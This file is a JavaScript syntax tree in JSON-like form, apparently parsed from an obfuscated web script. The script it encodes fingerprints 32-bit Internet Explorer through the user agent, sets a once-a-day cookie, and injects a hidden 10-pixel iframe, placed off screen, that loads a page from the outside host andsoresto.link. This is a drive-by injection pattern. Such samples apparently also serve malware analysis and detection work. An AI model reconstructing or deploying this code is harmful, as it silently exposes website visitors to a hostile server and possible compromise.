{
    type: "Program",
    sourceType: "script",
    body: [
        {
            type: "ExpressionStatement",
            expression: {
                type: "AssignmentExpression",
                operator: "=",
                left: {
                    type: "Identifier",
                    name: "FLCEGNkUdjHW"
                },
                right: {
                    type: "Identifier",
                    name: "window"
                }
            }
        },
        {
            type: "ExpressionStatement",
            expression: {
                type: "AssignmentExpression",
                operator: "=",
                left: {
                    type: "Identifier",
                    name: "GNtQhiSBEDAR"
                },
                right: {
                    type: "MemberExpression",
                    computed: True,
                    object: {
                        type: "Identifier",
                        name: "FLCEGNkUdjHW"
                    },
                    property: {
                        type: "Literal",
                        value: "document",
                        raw: "'document'"
                    }
                }
            }
        },
        {
            type: "ExpressionStatement",
            expression: {
                type: "AssignmentExpression",
                operator: "=",
                left: {
                    type: "Identifier",
                    name: "LVJlbhQAGwN"
                },
                right: {
                    type: "MemberExpression",
                    computed: True,
                    object: {
                        type: "Identifier",
                        name: "FLCEGNkUdjHW"
                    },
                    property: {
                        type: "Literal",
                        value: "navigator",
                        raw: "'navigator'"
                    }
                }
            }
        },
        {
            type: "VariableDeclaration",
            declarations: [
                {
                    type: "VariableDeclarator",
                    id: {
                        type: "Identifier",
                        name: "GRxrXclVbnSp"
                    },
                    init: {
                        type: "Identifier",
                        name: "window"
                    }
                }
            ],
            kind: "var"
        },
        {
            type: "VariableDeclaration",
            declarations: [
                {
                    type: "VariableDeclarator",
                    id: {
                        type: "Identifier",
                        name: "doc"
                    },
                    init: {
                        type: "MemberExpression",
                        computed: False,
                        object: {
                            type: "Identifier",
                            name: "GRxrXclVbnSp"
                        },
                        property: {
                            type: "Identifier",
                            name: "document"
                        }
                    }
                }
            ],
            kind: "var"
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "setCookie"
            },
            params: [
                {
                    type: "Identifier",
                    name: "name"
                },
                {
                    type: "Identifier",
                    name: "value"
                },
                {
                    type: "Identifier",
                    name: "expires"
                }
            ],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "MemberExpression",
                                computed: False,
                                object: {
                                    type: "Identifier",
                                    name: "doc"
                                },
                                property: {
                                    type: "Identifier",
                                    name: "cookie"
                                }
                            },
                            right: {
                                type: "BinaryExpression",
                                operator: "+",
                                left: {
                                    type: "BinaryExpression",
                                    operator: "+",
                                    left: {
                                        type: "BinaryExpression",
                                        operator: "+",
                                        left: {
                                            type: "BinaryExpression",
                                            operator: "+",
                                            left: {
                                                type: "BinaryExpression",
                                                operator: "+",
                                                left: {
                                                    type: "Identifier",
                                                    name: "name"
                                                },
                                                right: {
                                                    type: "Literal",
                                                    value: "=",
                                                    raw: "'='"
                                                }
                                            },
                                            right: {
                                                type: "CallExpression",
                                                callee: {
                                                    type: "Identifier",
                                                    name: "escape"
                                                },
                                                arguments: [
                                                    {
                                                        type: "Identifier",
                                                        name: "value"
                                                    }
                                                ]
                                            }
                                        },
                                        right: {
                                            type: "Literal",
                                            value: "; expires=",
                                            raw: "\"; expires=\""
                                        }
                                    },
                                    right: {
                                        type: "CallExpression",
                                        callee: {
                                            type: "MemberExpression",
                                            computed: False,
                                            object: {
                                                type: "Identifier",
                                                name: "expires"
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "toGMTString"
                                            }
                                        },
                                        arguments: []
                                    }
                                },
                                right: {
                                    type: "Literal",
                                    value: "; path=/",
                                    raw: "\"; path=/\""
                                }
                            }
                        }
                    },
                    {
                        type: "ReturnStatement"
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "getCookie"
            },
            params: [
                {
                    type: "Identifier",
                    name: "name"
                }
            ],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "cookie"
                                },
                                init: {
                                    type: "BinaryExpression",
                                    operator: "+",
                                    left: {
                                        type: "Literal",
                                        value: " ",
                                        raw: "' '"
                                    },
                                    right: {
                                        type: "MemberExpression",
                                        computed: False,
                                        object: {
                                            type: "Identifier",
                                            name: "doc"
                                        },
                                        property: {
                                            type: "Identifier",
                                            name: "cookie"
                                        }
                                    }
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "search"
                                },
                                init: {
                                    type: "BinaryExpression",
                                    operator: "+",
                                    left: {
                                        type: "BinaryExpression",
                                        operator: "+",
                                        left: {
                                            type: "Literal",
                                            value: " ",
                                            raw: "' '"
                                        },
                                        right: {
                                            type: "Identifier",
                                            name: "name"
                                        }
                                    },
                                    right: {
                                        type: "Literal",
                                        value: "=",
                                        raw: "'='"
                                    }
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "setStr"
                                },
                                init: {
                                    type: "Literal",
                                    raw: "null"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "offset"
                                },
                                init: {
                                    type: "Literal",
                                    value: 0,
                                    raw: "0"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "end"
                                },
                                init: {
                                    type: "Literal",
                                    value: 0,
                                    raw: "0"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "IfStatement",
                        test: {
                            type: "BinaryExpression",
                            operator: ">",
                            left: {
                                type: "MemberExpression",
                                computed: False,
                                object: {
                                    type: "Identifier",
                                    name: "cookie"
                                },
                                property: {
                                    type: "Identifier",
                                    name: "length"
                                }
                            },
                            right: {
                                type: "Literal",
                                value: 0,
                                raw: "0"
                            }
                        },
                        consequent: {
                            type: "BlockStatement",
                            body: [
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "Identifier",
                                            name: "offset"
                                        },
                                        right: {
                                            type: "CallExpression",
                                            callee: {
                                                type: "MemberExpression",
                                                computed: False,
                                                object: {
                                                    type: "Identifier",
                                                    name: "cookie"
                                                },
                                                property: {
                                                    type: "Identifier",
                                                    name: "indexOf"
                                                }
                                            },
                                            arguments: [
                                                {
                                                    type: "Identifier",
                                                    name: "search"
                                                }
                                            ]
                                        }
                                    }
                                },
                                {
                                    type: "IfStatement",
                                    test: {
                                        type: "BinaryExpression",
                                        operator: "!=",
                                        left: {
                                            type: "Identifier",
                                            name: "offset"
                                        },
                                        right: {
                                            type: "UnaryExpression",
                                            prefix: True,
                                            operator: "-",
                                            argument: {
                                                type: "Literal",
                                                value: 1,
                                                raw: "1"
                                            }
                                        }
                                    },
                                    consequent: {
                                        type: "BlockStatement",
                                        body: [
                                            {
                                                type: "ExpressionStatement",
                                                expression: {
                                                    type: "AssignmentExpression",
                                                    operator: "+=",
                                                    left: {
                                                        type: "Identifier",
                                                        name: "offset"
                                                    },
                                                    right: {
                                                        type: "MemberExpression",
                                                        computed: False,
                                                        object: {
                                                            type: "Identifier",
                                                            name: "search"
                                                        },
                                                        property: {
                                                            type: "Identifier",
                                                            name: "length"
                                                        }
                                                    }
                                                }
                                            },
                                            {
                                                type: "ExpressionStatement",
                                                expression: {
                                                    type: "AssignmentExpression",
                                                    operator: "=",
                                                    left: {
                                                        type: "Identifier",
                                                        name: "end"
                                                    },
                                                    right: {
                                                        type: "CallExpression",
                                                        callee: {
                                                            type: "MemberExpression",
                                                            computed: False,
                                                            object: {
                                                                type: "Identifier",
                                                                name: "cookie"
                                                            },
                                                            property: {
                                                                type: "Identifier",
                                                                name: "indexOf"
                                                            }
                                                        },
                                                        arguments: [
                                                            {
                                                                type: "Literal",
                                                                value: ";",
                                                                raw: "';'"
                                                            },
                                                            {
                                                                type: "Identifier",
                                                                name: "offset"
                                                            }
                                                        ]
                                                    }
                                                }
                                            },
                                            {
                                                type: "IfStatement",
                                                test: {
                                                    type: "BinaryExpression",
                                                    operator: "==",
                                                    left: {
                                                        type: "Identifier",
                                                        name: "end"
                                                    },
                                                    right: {
                                                        type: "UnaryExpression",
                                                        prefix: True,
                                                        operator: "-",
                                                        argument: {
                                                            type: "Literal",
                                                            value: 1,
                                                            raw: "1"
                                                        }
                                                    }
                                                },
                                                consequent: {
                                                    type: "BlockStatement",
                                                    body: [
                                                        {
                                                            type: "ExpressionStatement",
                                                            expression: {
                                                                type: "AssignmentExpression",
                                                                operator: "=",
                                                                left: {
                                                                    type: "Identifier",
                                                                    name: "end"
                                                                },
                                                                right: {
                                                                    type: "MemberExpression",
                                                                    computed: False,
                                                                    object: {
                                                                        type: "Identifier",
                                                                        name: "cookie"
                                                                    },
                                                                    property: {
                                                                        type: "Identifier",
                                                                        name: "length"
                                                                    }
                                                                }
                                                            }
                                                        }
                                                    ]
                                                }
                                            },
                                            {
                                                type: "ExpressionStatement",
                                                expression: {
                                                    type: "AssignmentExpression",
                                                    operator: "=",
                                                    left: {
                                                        type: "Identifier",
                                                        name: "setStr"
                                                    },
                                                    right: {
                                                        type: "CallExpression",
                                                        callee: {
                                                            type: "MemberExpression",
                                                            computed: False,
                                                            object: {
                                                                type: "Identifier",
                                                                name: "GRxrXclVbnSp"
                                                            },
                                                            property: {
                                                                type: "Identifier",
                                                                name: "unescape"
                                                            }
                                                        },
                                                        arguments: [
                                                            {
                                                                type: "CallExpression",
                                                                callee: {
                                                                    type: "MemberExpression",
                                                                    computed: False,
                                                                    object: {
                                                                        type: "Identifier",
                                                                        name: "cookie"
                                                                    },
                                                                    property: {
                                                                        type: "Identifier",
                                                                        name: "substring"
                                                                    }
                                                                },
                                                                arguments: [
                                                                    {
                                                                        type: "Identifier",
                                                                        name: "offset"
                                                                    },
                                                                    {
                                                                        type: "Identifier",
                                                                        name: "end"
                                                                    }
                                                                ]
                                                            }
                                                        ]
                                                    }
                                                }
                                            }
                                        ]
                                    }
                                }
                            ]
                        }
                    },
                    {
                        type: "ReturnStatement",
                        argument: {
                            type: "Identifier",
                            name: "setStr"
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "ZdoMJDGFUPL"
            },
            params: [],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "IfStatement",
                        test: {
                            type: "UnaryExpression",
                            prefix: True,
                            operator: "!",
                            argument: {
                                type: "CallExpression",
                                callee: {
                                    type: "Identifier",
                                    name: "getCookie"
                                },
                                arguments: [
                                    {
                                        type: "Literal",
                                        value: "CIeyOkotgDKVcmfs",
                                        raw: "\"CIeyOkotgDKVcmfs\""
                                    }
                                ]
                            }
                        },
                        consequent: {
                            type: "BlockStatement",
                            body: [
                                {
                                    type: "VariableDeclaration",
                                    declarations: [
                                        {
                                            type: "VariableDeclarator",
                                            id: {
                                                type: "Identifier",
                                                name: "expires"
                                            },
                                            init: {
                                                type: "NewExpression",
                                                callee: {
                                                    type: "Identifier",
                                                    name: "Date"
                                                },
                                                arguments: []
                                            }
                                        }
                                    ],
                                    kind: "var"
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "CallExpression",
                                        callee: {
                                            type: "MemberExpression",
                                            computed: False,
                                            object: {
                                                type: "Identifier",
                                                name: "expires"
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "setTime"
                                            }
                                        },
                                        arguments: [
                                            {
                                                type: "BinaryExpression",
                                                operator: "+",
                                                left: {
                                                    type: "CallExpression",
                                                    callee: {
                                                        type: "MemberExpression",
                                                        computed: False,
                                                        object: {
                                                            type: "Identifier",
                                                            name: "expires"
                                                        },
                                                        property: {
                                                            type: "Identifier",
                                                            name: "getTime"
                                                        }
                                                    },
                                                    arguments: []
                                                },
                                                right: {
                                                    type: "Literal",
                                                    value: 86400000,
                                                    raw: "86400000"
                                                }
                                            }
                                        ]
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "CallExpression",
                                        callee: {
                                            type: "Identifier",
                                            name: "setCookie"
                                        },
                                        arguments: [
                                            {
                                                type: "Literal",
                                                value: "CIeyOkotgDKVcmfs",
                                                raw: "\"CIeyOkotgDKVcmfs\""
                                            },
                                            {
                                                type: "Literal",
                                                value: "79998daded6ddd0f14d2ac786dedeb57",
                                                raw: "'79998daded6ddd0f14d2ac786dedeb57'"
                                            },
                                            {
                                                type: "Identifier",
                                                name: "expires"
                                            }
                                        ]
                                    }
                                },
                                {
                                    type: "ReturnStatement",
                                    argument: {
                                        type: "Literal",
                                        value: True,
                                        raw: "true"
                                    }
                                }
                            ]
                        },
                        alternate: {
                            type: "BlockStatement",
                            body: [
                                {
                                    type: "ReturnStatement",
                                    argument: {
                                        type: "Literal",
                                        value: False,
                                        raw: "false"
                                    }
                                }
                            ]
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "aTbMBrtgpxiF"
            },
            params: [
                {
                    type: "Identifier",
                    name: "j7r"
                }
            ],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "fk"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "fk"
                            },
                            right: {
                                type: "Identifier",
                                name: "window"
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "ConditionalExpression",
                            test: {
                                type: "MemberExpression",
                                computed: True,
                                object: {
                                    type: "Identifier",
                                    name: "GNtQhiSBEDAR"
                                },
                                property: {
                                    type: "Literal",
                                    value: "addEventListener",
                                    raw: "\"addEventListener\""
                                }
                            },
                            consequent: {
                                type: "CallExpression",
                                callee: {
                                    type: "MemberExpression",
                                    computed: True,
                                    object: {
                                        type: "Identifier",
                                        name: "GNtQhiSBEDAR"
                                    },
                                    property: {
                                        type: "Literal",
                                        value: "addEventListener",
                                        raw: "\"addEventListener\""
                                    }
                                },
                                arguments: [
                                    {
                                        type: "Literal",
                                        value: "DOMContentLoaded",
                                        raw: "\"DOMContentLoaded\""
                                    },
                                    {
                                        type: "Identifier",
                                        name: "j7r"
                                    }
                                ]
                            },
                            alternate: {
                                type: "CallExpression",
                                callee: {
                                    type: "MemberExpression",
                                    computed: True,
                                    object: {
                                        type: "Identifier",
                                        name: "fk"
                                    },
                                    property: {
                                        type: "Literal",
                                        value: "attachEvent",
                                        raw: "\"attachEvent\""
                                    }
                                },
                                arguments: [
                                    {
                                        type: "Literal",
                                        value: "onload",
                                        raw: "\"onload\""
                                    },
                                    {
                                        type: "Identifier",
                                        name: "j7r"
                                    }
                                ]
                            }
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "nWSwtsTUNiOcY"
            },
            params: [],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "ReturnStatement",
                        argument: {
                            type: "MemberExpression",
                            computed: True,
                            object: {
                                type: "Identifier",
                                name: "LVJlbhQAGwN"
                            },
                            property: {
                                type: "Literal",
                                value: "userAgent",
                                raw: "\"userAgent\""
                            }
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "qCwZFKjSaYI"
            },
            params: [
                {
                    type: "Identifier",
                    name: "y0l"
                },
                {
                    type: "Identifier",
                    name: "np1"
                }
            ],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "ReturnStatement",
                        argument: {
                            type: "CallExpression",
                            callee: {
                                type: "MemberExpression",
                                computed: True,
                                object: {
                                    type: "Identifier",
                                    name: "y0l"
                                },
                                property: {
                                    type: "Literal",
                                    value: "test",
                                    raw: "\"test\""
                                }
                            },
                            arguments: [
                                {
                                    type: "Identifier",
                                    name: "np1"
                                }
                            ]
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "haHExLmofXCiW"
            },
            params: [],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "fq"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "fq"
                            },
                            right: {
                                type: "CallExpression",
                                callee: {
                                    type: "Identifier",
                                    name: "nWSwtsTUNiOcY"
                                },
                                arguments: []
                            }
                        }
                    },
                    {
                        type: "ReturnStatement",
                        argument: {
                            type: "LogicalExpression",
                            operator: "||",
                            left: {
                                type: "CallExpression",
                                callee: {
                                    type: "Identifier",
                                    name: "qCwZFKjSaYI"
                                },
                                arguments: [
                                    {
                                        type: "Literal",
                                        value: re.compile('Win64;', re.IGNORECASE),
                                        raw: "/Win64;/i",
                                        regex: {
                                            pattern: "Win64;",
                                            flags: "i"
                                        }
                                    },
                                    {
                                        type: "Identifier",
                                        name: "fq"
                                    }
                                ]
                            },
                            right: {
                                type: "CallExpression",
                                callee: {
                                    type: "Identifier",
                                    name: "qCwZFKjSaYI"
                                },
                                arguments: [
                                    {
                                        type: "Literal",
                                        value: re.compile('x64;', re.IGNORECASE),
                                        raw: "/x64;/i",
                                        regex: {
                                            pattern: "x64;",
                                            flags: "i"
                                        }
                                    },
                                    {
                                        type: "Identifier",
                                        name: "fq"
                                    }
                                ]
                            }
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "CUjwmVBZGTEp"
            },
            params: [],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "ai"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "be"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "be"
                            },
                            right: {
                                type: "Literal",
                                value: re.compile('Trident', re.IGNORECASE),
                                raw: "/Trident/i",
                                regex: {
                                    pattern: "Trident",
                                    flags: "i"
                                }
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "ai"
                            },
                            right: {
                                type: "CallExpression",
                                callee: {
                                    type: "Identifier",
                                    name: "nWSwtsTUNiOcY"
                                },
                                arguments: []
                            }
                        }
                    },
                    {
                        type: "IfStatement",
                        test: {
                            type: "UnaryExpression",
                            prefix: True,
                            operator: "!",
                            argument: {
                                type: "CallExpression",
                                callee: {
                                    type: "Identifier",
                                    name: "qCwZFKjSaYI"
                                },
                                arguments: [
                                    {
                                        type: "Identifier",
                                        name: "be"
                                    },
                                    {
                                        type: "Identifier",
                                        name: "ai"
                                    }
                                ]
                            }
                        },
                        consequent: {
                            type: "BlockStatement",
                            body: [
                                {
                                    type: "ReturnStatement",
                                    argument: {
                                        type: "Literal",
                                        value: 0,
                                        raw: "0"
                                    }
                                }
                            ]
                        },
                        alternate: {
                            type: "BlockStatement",
                            body: [
                                {
                                    type: "ReturnStatement",
                                    argument: {
                                        type: "Literal",
                                        value: True,
                                        raw: "true"
                                    }
                                }
                            ]
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "FunctionDeclaration",
            expression: False,
            isAsync: False,
            id: {
                type: "Identifier",
                name: "eUKzOquWidBPD"
            },
            params: [],
            body: {
                type: "BlockStatement",
                body: [
                    {
                        type: "VariableDeclaration",
                        declarations: [
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "t55sd"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "u0u"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "l2"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "gas"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "dis"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "qt7"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "y1"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "od66s"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "hia"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "mbs"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "cun"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "ljjd3d"
                                }
                            },
                            {
                                type: "VariableDeclarator",
                                id: {
                                    type: "Identifier",
                                    name: "ffa"
                                }
                            }
                        ],
                        kind: "var"
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "od66s"
                            },
                            right: {
                                type: "Literal",
                                value: "src",
                                raw: "\"src\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "y1"
                            },
                            right: {
                                type: "Literal",
                                value: "iframe",
                                raw: "\"iframe\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "u0u"
                            },
                            right: {
                                type: "Literal",
                                value: "cssText",
                                raw: "\"cssText\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "l2"
                            },
                            right: {
                                type: "Literal",
                                value: "getElementsByTagName",
                                raw: "\"getElementsByTagName\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "cun"
                            },
                            right: {
                                type: "Literal",
                                value: "body",
                                raw: "\"body\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "qt7"
                            },
                            right: {
                                type: "Literal",
                                value: "width",
                                raw: "\"width\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "hia"
                            },
                            right: {
                                type: "Literal",
                                value: "height",
                                raw: "\"height\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "ffa"
                            },
                            right: {
                                type: "Literal",
                                value: "appendChild",
                                raw: "\"appendChild\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "gas"
                            },
                            right: {
                                type: "Literal",
                                value: "createElement",
                                raw: "\"createElement\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "dis"
                            },
                            right: {
                                type: "Literal",
                                value: "style",
                                raw: "\"style\""
                            }
                        }
                    },
                    {
                        type: "ExpressionStatement",
                        expression: {
                            type: "AssignmentExpression",
                            operator: "=",
                            left: {
                                type: "Identifier",
                                name: "mbs"
                            },
                            right: {
                                type: "Literal",
                                value: "10",
                                raw: "\"10\""
                            }
                        }
                    },
                    {
                        type: "IfStatement",
                        test: {
                            type: "LogicalExpression",
                            operator: "&&",
                            left: {
                                type: "LogicalExpression",
                                operator: "&&",
                                left: {
                                    type: "CallExpression",
                                    callee: {
                                        type: "Identifier",
                                        name: "ZdoMJDGFUPL"
                                    },
                                    arguments: []
                                },
                                right: {
                                    type: "CallExpression",
                                    callee: {
                                        type: "Identifier",
                                        name: "CUjwmVBZGTEp"
                                    },
                                    arguments: []
                                }
                            },
                            right: {
                                type: "UnaryExpression",
                                prefix: True,
                                operator: "!",
                                argument: {
                                    type: "CallExpression",
                                    callee: {
                                        type: "Identifier",
                                        name: "haHExLmofXCiW"
                                    },
                                    arguments: []
                                }
                            }
                        },
                        consequent: {
                            type: "BlockStatement",
                            body: [
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "Identifier",
                                            name: "t55sd"
                                        },
                                        right: {
                                            type: "Identifier",
                                            name: "mbs"
                                        }
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "Identifier",
                                            name: "ljjd3d"
                                        },
                                        right: {
                                            type: "CallExpression",
                                            callee: {
                                                type: "MemberExpression",
                                                computed: True,
                                                object: {
                                                    type: "Identifier",
                                                    name: "GNtQhiSBEDAR"
                                                },
                                                property: {
                                                    type: "Identifier",
                                                    name: "gas"
                                                }
                                            },
                                            arguments: [
                                                {
                                                    type: "Identifier",
                                                    name: "y1"
                                                }
                                            ]
                                        }
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "MemberExpression",
                                            computed: True,
                                            object: {
                                                type: "Identifier",
                                                name: "ljjd3d"
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "qt7"
                                            }
                                        },
                                        right: {
                                            type: "Identifier",
                                            name: "t55sd"
                                        }
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "MemberExpression",
                                            computed: True,
                                            object: {
                                                type: "Identifier",
                                                name: "ljjd3d"
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "hia"
                                            }
                                        },
                                        right: {
                                            type: "Identifier",
                                            name: "t55sd"
                                        }
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "MemberExpression",
                                            computed: True,
                                            object: {
                                                type: "MemberExpression",
                                                computed: True,
                                                object: {
                                                    type: "Identifier",
                                                    name: "ljjd3d"
                                                },
                                                property: {
                                                    type: "Identifier",
                                                    name: "dis"
                                                }
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "u0u"
                                            }
                                        },
                                        right: {
                                            type: "Literal",
                                            value: "position:absolute;left:-1610px;top:-1637px",
                                            raw: "\"position:absolute;left:-1610px;top:-1637px\""
                                        }
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "AssignmentExpression",
                                        operator: "=",
                                        left: {
                                            type: "MemberExpression",
                                            computed: True,
                                            object: {
                                                type: "Identifier",
                                                name: "ljjd3d"
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "od66s"
                                            }
                                        },
                                        right: {
                                            type: "Literal",
                                            value: "http://andsoresto.link/QEBQAkoIS1AIUkVWRVQVQlkXW1gIXQ.html",
                                            raw: "\"http://andsoresto.link/QEBQAkoIS1AIUkVWRVQVQlkXW1gIXQ.html\""
                                        }
                                    }
                                },
                                {
                                    type: "ExpressionStatement",
                                    expression: {
                                        type: "CallExpression",
                                        callee: {
                                            type: "MemberExpression",
                                            computed: True,
                                            object: {
                                                type: "MemberExpression",
                                                computed: True,
                                                object: {
                                                    type: "CallExpression",
                                                    callee: {
                                                        type: "MemberExpression",
                                                        computed: True,
                                                        object: {
                                                            type: "Identifier",
                                                            name: "GNtQhiSBEDAR"
                                                        },
                                                        property: {
                                                            type: "Identifier",
                                                            name: "l2"
                                                        }
                                                    },
                                                    arguments: [
                                                        {
                                                            type: "Identifier",
                                                            name: "cun"
                                                        }
                                                    ]
                                                },
                                                property: {
                                                    type: "Literal",
                                                    value: 0,
                                                    raw: "0"
                                                }
                                            },
                                            property: {
                                                type: "Identifier",
                                                name: "ffa"
                                            }
                                        },
                                        arguments: [
                                            {
                                                type: "Identifier",
                                                name: "ljjd3d"
                                            }
                                        ]
                                    }
                                }
                            ]
                        }
                    }
                ]
            },
            generator: False
        },
        {
            type: "ExpressionStatement",
            expression: {
                type: "CallExpression",
                callee: {
                    type: "Identifier",
                    name: "aTbMBrtgpxiF"
                },
                arguments: [
                    {
                        type: "Identifier",
                        name: "eUKzOquWidBPD"
                    }
                ]
            }
        }
    ],
    errors: []
}